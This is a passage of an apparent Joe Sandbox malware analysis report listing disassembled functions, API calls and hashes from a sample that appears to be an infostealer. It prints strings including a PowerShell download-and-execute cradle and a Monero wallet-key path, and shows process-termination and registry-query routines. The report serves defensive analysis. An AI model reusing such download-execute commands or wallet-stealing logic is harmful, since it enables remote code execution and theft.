                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 0d5b1d6172961d9fa21b979fcef00a3599c6ba3d64392ac77e85af413a08a924
                                      • Instruction ID: 5eb2a73943d88d1e046fe1ed76d4edb239162dc04fe1752bab47d0196a7709f8
                                      • Opcode Fuzzy Hash: 0d5b1d6172961d9fa21b979fcef00a3599c6ba3d64392ac77e85af413a08a924
                                      • Instruction Fuzzy Hash: B75177B19443189BEB24DB64DC4AFDE7778AF44700F044598B60DAB2C1EB75AB84CF61
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00DAFA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00DAFADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00DAFB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c03fd015d8c5632e877231817fdcdc6568a6508647902982549606bd1d381d8f
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 7F419531900119EBCF10DFA8C884ADEBBB5FF46314F1885A5E919AB351D731D905CBB1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D35021
                                      • InternetOpenA.WININET(00D50DE3,00000000,00000000,00000000,00000000), ref: 00D3503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D35061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D35091
                                      • InternetCloseHandle.WININET(?), ref: 00D35109
                                      • InternetCloseHandle.WININET(?), ref: 00D35116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 6e7112a1090e53170db1269f3aacd3d3bbcd20091f7739e3756fe5f3f810020b
                                      • Instruction ID: 5e2490adbee031b1ba324f69549aca83cc08144a53b2712b133f9031dc86076c
                                      • Opcode Fuzzy Hash: 6e7112a1090e53170db1269f3aacd3d3bbcd20091f7739e3756fe5f3f810020b
                                      • Instruction Fuzzy Hash: 533117B4A40218ABDB24CF54DC85BDDB7B5EB48304F1081D8FB49A7284D7756EC58FA8
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D485B6
                                      • wsprintfA.USER32 ref: 00D485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48629
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E578,00000000,000F003F,?,00000400), ref: 00D4867C
                                      • lstrlen.KERNEL32(?), ref: 00D48691
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E4E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00D50B3C), ref: 00D48729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D487AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 2e479fe2f2fafe260cc77294f3cb56e648e45ecebb41e07a5a40453b9fcd5a1b
                                      • Instruction ID: 416b2ef485ca1511785416f9f9ba663839c3ca512e12a75f4d77d97638dc8c02
                                      • Opcode Fuzzy Hash: 2e479fe2f2fafe260cc77294f3cb56e648e45ecebb41e07a5a40453b9fcd5a1b
                                      • Instruction Fuzzy Hash: EF21E671A10218ABDB24DB54DC85FE9B3B9FB48704F1081D8E649A6180DF75AA85CFE4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D499C5
                                      • Process32First.KERNEL32(00D3A056,00000128), ref: 00D499D9
                                      • Process32Next.KERNEL32(00D3A056,00000128), ref: 00D499F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D49A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D49A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00D49A79
                                      • CloseHandle.KERNEL32(00D3A056), ref: 00D49A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 5f6637b11a527216ed5212d75c8253464166b7133528a20a8f611c3bda072caf
                                      • Instruction ID: 4acc0c2ce93d1bbcd72627d2e7f566b7585a7c8fe33cecaee04de14706696d45
                                      • Opcode Fuzzy Hash: 5f6637b11a527216ed5212d75c8253464166b7133528a20a8f611c3bda072caf
                                      • Instruction Fuzzy Hash: B2212C70900218EBDF31DFA6C899BDEB7B5BB48304F0441C8E549A6284C779AF84CFA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D4783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C208,00000000,00020119,00000000), ref: 00D4786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0167E518,00000000,00000000,?,000000FF), ref: 00D4788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D47898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: d202537bc76400badeae5eae95c7bb2f575af51005a219f10c7a579806f0c1ed
                                      • Instruction ID: c387b4ca9a8ce0a84b5f67fb5ca8be365b8c7aa09f9e41a3d6ef2a4e4fb20089
                                      • Opcode Fuzzy Hash: d202537bc76400badeae5eae95c7bb2f575af51005a219f10c7a579806f0c1ed
                                      • Instruction Fuzzy Hash: 41016275A04304BBEB10DBE4DD49FAE7779EB48700F004094FA85A7284D779AA00CB70
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D478C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D478CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C208,00000000,00020119,00D47849), ref: 00D478EB
                                      • RegQueryValueExA.ADVAPI32(00D47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4790A
                                      • RegCloseKey.ADVAPI32(00D47849), ref: 00D47914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: ca98b445e7d9697b1cf6744dcf5129bb88ad77f8ca8d7b41d5944e0a4cc02dfe
                                      • Instruction ID: c29fa34420f42d670389d9cab5e2108e0b204d3e24b84a6580f0538b9f954b17
                                      • Opcode Fuzzy Hash: ca98b445e7d9697b1cf6744dcf5129bb88ad77f8ca8d7b41d5944e0a4cc02dfe
                                      • Instruction Fuzzy Hash: 660167B5A40309BFEB10DBE4DC4AFAE7778EB08700F004594FA45A7284D7796A00CBA0
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                      • LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: c42ded494b43c4061459d135924f0142010a350c4eb0bd21115d97c8fad40528
                                      • Instruction ID: d31e8b24c9ee1a2ebcdb009c4fb3364a63e5774464d3792314d84f6c28780a1b
                                      • Opcode Fuzzy Hash: c42ded494b43c4061459d135924f0142010a350c4eb0bd21115d97c8fad40528
                                      • Instruction Fuzzy Hash: 9631DC74A00209EFDB14CF94D845FEE77B5EB48304F148158E951A7284D779AA81CFA1
                                      APIs
                                      • lstrcat.KERNEL32(?,0167E0E0), ref: 00D44A2B
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D44A51
                                      • lstrcat.KERNEL32(?,?), ref: 00D44A70
                                      • lstrcat.KERNEL32(?,?), ref: 00D44A84
                                      • lstrcat.KERNEL32(?,0166B7C0), ref: 00D44A97
                                      • lstrcat.KERNEL32(?,?), ref: 00D44AAB
                                      • lstrcat.KERNEL32(?,0167D800), ref: 00D44ABF
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F20: GetFileAttributesA.KERNEL32(00000000,?,00D31B94,?,?,00D5577C,?,?,00D50E22), ref: 00D48F2F
                                        • Part of subcall function 00D447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D447D0
                                        • Part of subcall function 00D447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00D447D7
                                        • Part of subcall function 00D447C0: wsprintfA.USER32 ref: 00D447F6
                                        • Part of subcall function 00D447C0: FindFirstFileA.KERNEL32(?,?), ref: 00D4480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 403dae6bbc1ee8160b734dc98633eddec37ba7db719b7bbbbd5b41cf5324a58f
                                      • Instruction ID: 59c701a6d1a8473ade96aaf38616eebb60a695e400f7176e97b96b0c8aee92ed
                                      • Opcode Fuzzy Hash: 403dae6bbc1ee8160b734dc98633eddec37ba7db719b7bbbbd5b41cf5324a58f
                                      • Instruction Fuzzy Hash: 813152B69002186BDB25FBB0DC9AEED733CEB48700F404589B65596045EE79A7C8CFB4
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D42FD5
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42F54
                                      • <, xrefs: 00D42F89
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42F14
                                      • ')", xrefs: 00D42F03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 5b6083b1daf6375be203310fbee457d24b4edbaabbab364f951521ee9a975185
                                      • Instruction ID: 1dae40a1aed534d1d59beb79948aad4908a3fab6dd4645dfc0add03f16d2e712
                                      • Opcode Fuzzy Hash: 5b6083b1daf6375be203310fbee457d24b4edbaabbab364f951521ee9a975185
                                      • Instruction Fuzzy Hash: 45410870D402089BEB14FFA4C8A2BEDBB79EF14340F404559E40666192EF742A49CFB1
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,0167D8C0,00000000,00020119,?), ref: 00D44344
                                      • RegQueryValueExA.ADVAPI32(?,0167DF48,00000000,00000000,00000000,000000FF), ref: 00D44368
                                      • RegCloseKey.ADVAPI32(?), ref: 00D44372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D44397
                                      • lstrcat.KERNEL32(?,0167DF30), ref: 00D443AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      • Opcode ID: fe9dabe7715b4fa5bc6f4620b3264af26a123966bf7b3e685450a5bf17f6947b
                                      • Instruction ID: e052b18eeea87d1b97cb77bfb5a3d3c43430ef8246fd387eca15f014e5f7c7a9
                                      • Opcode Fuzzy Hash: fe9dabe7715b4fa5bc6f4620b3264af26a123966bf7b3e685450a5bf17f6947b
                                      • Instruction Fuzzy Hash: 6C4199B69001086BDB25FBA0EC46FEE733DEB88700F004558B75656185EA7A5BD88BF1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: ea0d041163b58a1aeaa0538f504d098d92bc4333caab5b930d4916e8d6f5e815
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: CD219072D20628AFDB329F59CD41A6F3A79EB83BB0F095119F8196B211D7348D418BB0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0166C400,00000000,00020119,?), ref: 00D47FEE
                                      • RegQueryValueExA.ADVAPI32(?,0167D9E0,00000000,00000000,000000FF,000000FF), ref: 00D4800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00D48022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 86b7823a8e01fb3a2523617aaf33b8b562aaf8bb5a2b778556002bcbaf50f640
                                      • Instruction ID: 62262e6261846ed91de7243936419fc4455f106c0c82b1a52f19523c0b4a49b7
                                      • Opcode Fuzzy Hash: 86b7823a8e01fb3a2523617aaf33b8b562aaf8bb5a2b778556002bcbaf50f640
                                      • Instruction Fuzzy Hash: 0B119EB1A40305EFD710CF84D945FBFBBB8EB08B11F104119F695A7284DB7A69049BA1
                                      APIs
                                      • StrStrA.SHLWAPI(0167E0C8,00000000,00000000,?,00D39F71,00000000,0167E0C8,00000000), ref: 00D493FC
                                      • lstrcpyn.KERNEL32(01007580,0167E0C8,0167E0C8,?,00D39F71,00000000,0167E0C8), ref: 00D49420
